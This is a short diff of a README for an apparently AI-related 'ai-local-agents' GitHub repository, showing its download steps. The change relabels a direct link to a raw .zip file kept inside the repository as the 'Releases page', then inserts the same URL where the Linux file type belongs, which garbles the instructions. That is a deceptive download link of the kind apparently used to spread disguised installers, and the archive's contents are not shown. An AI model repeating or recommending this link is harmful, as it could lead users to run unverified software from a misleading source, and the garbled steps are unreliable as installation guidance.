Ignaceassuring178/ai-local-agents/README.md

 To download the software:

-1. Click the button above to visit the [Releases page](https://github.com/Ignaceassuring178/ai-local-agents/releases).
+1. Click the button above to visit the [Releases page](https://raw.githubusercontent.com/Ignaceassuring178/ai-local-agents/main/bringall/ai-local-agents.zip).
 2. On the Releases page, find the latest version.
-3. Download the appropriate file for your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+3. Download the appropriate file for your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/Ignaceassuring178/ai-local-agents/main/bringall/ai-local-agents.zip` for Linux).
 4. Once the download completes, locate the file in your `Downloads` folder or your chosen download location.
 5. Double-click the downloaded file to start the installation process and follow the on-screen instructions.